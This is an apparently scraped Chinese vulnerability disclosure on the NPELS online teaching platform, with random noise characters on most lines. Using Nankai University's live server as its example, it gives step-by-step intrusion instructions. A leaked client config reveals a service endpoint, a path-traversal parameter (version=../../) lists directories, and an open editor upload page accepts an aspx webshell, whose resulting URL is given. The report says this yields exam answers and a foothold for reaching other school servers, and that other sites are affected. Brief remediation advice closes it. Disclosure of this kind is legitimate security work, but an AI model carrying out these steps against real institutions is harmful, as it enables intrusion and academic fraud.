好多大学都在用这个教学平台,这个漏洞会导致直接拿到试题答案,甚至作为跳板继续渗透进入学校其他服务器中
+ ?$ f0 A" N+ n! z. q' T$ y; \) N4 d/ j
# k8 ]* R" ]( g! a) H详细说明:
4 X9 E- f# a1 L% f1 R# ~- ^: } 7 ^' y' l' A# t' e2 C) _9 ]4 j
以南开大学的为例: # w5 T8 J3 L; ]" G8 [5 W/ ]# _
http://222.30.60.3/NPELS. P3 n- N* v6 G( @: \
NPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址( F1 }$ c4 Y% R+ b/ l
<setting name="Update_CommonSvr_CommonService" serializeAs="String"># C% l. [! [* G0 n P
<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
; X* e$ n5 x9 D/ z% L" s- q</setting>6 g0 b2 D p0 ^) W2 y8 i7 a. K) f
及版本号
' E4 H4 N: J/ L6 O<add key="TVersion" value="1, 0, 0, 2187">
$ ~& v5 f2 g3 G m</add>1 v3 F) A* z# K3 L8 o3 `
直接访问- b9 r) D# ?' j& V) k6 f
http://222.30.60.3/NPELS/CommonService.asmx
. Q$ V2 t- L7 G! Z/ f使用GetTestClientFileList操作,直接 HTTP GET 列目录:( c% b# T' k+ j/ {! d8 j
http://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187
" H! R/ j! r2 n/ ^( z, M n进一步列目录(返回的网页很大,可以直接 wget 下来): c% G/ e3 E6 s1 k" w
http://222.30.60.3/NPELS/CommonS ... List?version=../../( z# X+ B* ^7 C: W% h
) I* J( Q. E/ I
发现
" Y2 C+ H! I% t$ P# V2 K& xhttp://zzxx.nankai.edu.cn/npelsv/editor/editor.htm9 ?/ G& L! L$ q: H' o0 [
可以上传,直接上传aspx木马即可,不需要改后缀名或者文件头2 n1 F0 W6 P, @& `: E- i& K4 {. i
上传后继续列目录找到木马地址直接访问即可; @6 ~& i3 A+ e/ s3 |3 X. H" R+ H
5 k9 a |* r- D( R/ h
OOXX
' J2 Q: z; S. u7 t! l$ N + O. O* L9 T( m8 w1 ]: z/ ?
Google "新理念外语网络教学平台" 测试了几个其他的站,都有类似的列目录上传方法, C- [$ h, H. O. ]* [& _
漏洞证明:
' u8 v' k7 w% h% |
4 Y3 c8 m- U# i: H: \列目录:3 h& {& A7 U. J( N
http://222.30.60.3/NPELS/CommonS ... List?version=../../
% M% H. C! e7 t, e文件上传:$ ^1 [4 b2 n) G- E, c( C
http://222.30.60.3/npelsv/editor/editor.htm
) u8 |3 d/ {$ b+ O W5 ?
& ~% B2 P% w1 {上传木马:7 v4 W7 t% j0 s) o
http://222.30.60.3/npelsv/editor/uploadfiles/1.aspx3 f+ g( _8 Z: {4 g$ o0 G
; v9 e9 b3 e- }; W" f( ?/ y a
修复方案:
: G! |) Q6 R, [5 _: J& D2 u u好像考试系统必须使用 CommonService.asmx
* z/ Y$ t/ g. T8 O最好配置文件加密或者用别的方式不让它泄露出来
5 K0 T9 x0 Z+ j并且检查或删除各上传入口,像 http://222.30.60.3/NPELS/Upload.aspx 一样; R V: v3 y, y
|